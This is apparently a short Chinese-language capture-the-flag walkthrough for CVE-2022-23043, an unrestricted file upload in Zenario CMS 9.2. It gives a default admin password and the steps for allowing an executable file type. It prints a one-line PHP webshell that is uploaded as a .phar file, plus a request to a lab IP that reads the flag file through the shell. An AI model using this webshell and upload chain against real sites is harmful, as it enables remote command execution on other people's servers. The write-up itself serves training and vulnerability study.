简介
CVE-2022-23043是一个与Zenario CMS 9.2文件上传漏洞相关的安全漏洞。该漏洞被定义为文件的不加限制上传,攻击者可以利用这个漏洞上传webshell以执行任意命令。利用这个漏洞的攻击者暂无特定情况。要利用此漏洞,攻击者首先需要访问Zenario CMS的管理后台并通过使用弱口令“admin/adminqwe12”进行登录。
攻击过程
1.打开靶场,扫描靶场发现路径admin.php,发现登陆页面,使用上述账号密码登录
2.登陆进去之后修改配置
修改完成之后,点击最底部check again,然后点击continue
3.进入首页,左上角依次点击按钮:【Go to Organizer】-【Configuration】-【File/MIME Types】
创建一个新的可执行文件,并保存。
4.按照图中位置点击:【Documents】-【Upload documents】-【Public】选择公开
创建一个testshell.phar文件,文件内容为
<?php system($_GET[1]); phpinfo();?>
执行此文件,并上传
4.选中上传的文件,依次点击:【Actions】-【View public link】
5.复制此链接进行访问
6.使用命令请求flag
http://39.106.48.123:18787/public/downloads/p7SPu/testshell.phar?1=cat%20../../../../../../../flag
得到flag。